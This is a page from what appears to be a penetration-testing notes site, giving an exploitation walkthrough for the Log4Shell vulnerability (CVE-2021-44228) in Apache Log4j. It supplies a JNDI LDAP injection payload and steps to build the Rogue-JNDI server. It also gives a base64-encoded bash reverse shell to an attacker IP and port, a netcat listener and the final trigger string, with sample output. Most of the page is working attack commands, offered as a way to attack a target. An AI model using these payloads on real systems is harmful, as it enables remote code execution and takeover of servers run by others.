CVE - Log4Shell

Is a critical vulnerability now reported as CVE-2021-44228 discovered in the Apache Log4j library, widely used for logging in Java-based applications. It allows attackers to execute arbitrary code on a server by injecting a malicious payload into a log message.

Here we can find a way to do an attack on a target affected by this vulnerability:

  • Send a payload to confirm the server is connecting back

# Insert this payload on the vulnerable point
${jndi:ldap://$IP/test} # Specify your IP

# Set TCP listener on our machine
sudo tcpdump -i $interface port $LDAPport # Specify the Network Interface you are using and the port running LDAP which by default is 389

# If it works, we will see a result like this
01:02:56.775423 IP $TargetIP.48214 > $OurIP.ldap: Flags [S], seq 1793598680, win 64240, options [mss 1340,sackOK,TS val 2750652936 ecr 0,nop,wscale 7], length 0
01:02:56.775456 IP $OurIP.ldap > $TargetIP.48214: Flags [R.], seq 0, ack 1793598681, win 0, length 0

  • Install necessary Java tools to generate a payload

sudo apt install maven
sudo apt install openjdk-24-jdk

  • Download and build the Rogue-JNDI Java application

git clone https://github.com/veracode-research/rogue-jndi
cd 
mvn package

  • Create a payload to use 

echo 'bash -c bash -i >&/dev/tcp/$IP/$port 0>&1' | base64

This example is done with a reverse shell but could be any command desired for the RCE, and we encode the payload to avoid issues with Rogue-JNDI

  • Start the Rogue-JNDI application while passing in the payload

# Use the encoded payload and specify your IP
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,$encPayload}|{base64,-d}|{bash,-i}" --hostname "$IP"

# If it works, we will see a result like this
+-+-+-+-+-+-+-+-+-+
|R|o|g|u|e|J|n|d|i|
+-+-+-+-+-+-+-+-+-+
Starting HTTP server on 0.0.0.0:8000
Starting LDAP server on 0.0.0.0:1389
Mapping ldap://10.10.14.117:1389/o=websphere1 to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.117:1389/o=websphere1,wsdl=* to artsploit.controllers.WebSphere1
Mapping ldap://10.10.14.117:1389/ to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.117:1389/o=reference to artsploit.controllers.RemoteReference
Mapping ldap://10.10.14.117:1389/o=groovy to artsploit.controllers.Groovy
Mapping ldap://10.10.14.117:1389/o=tomcat to artsploit.controllers.Tomcat
Mapping ldap://10.10.14.117:1389/o=websphere2 to artsploit.controllers.WebSphere2
Mapping ldap://10.10.14.117:1389/o=websphere2,jar=* to artsploit.controllers.WebSphere2

  • (Optional) Set up a Netcat listener

nc -nvlp 4444

This is done working with the example of the reverse shell

  • Access to the created payload using the vulnerable point

${jndi:ldap://$IP:1389/o=tomcat}
#If successful the command will be executed on the target host
PreviousWordPress - Getting credentials from configuration filesNextCVE - Shellshock

Last updated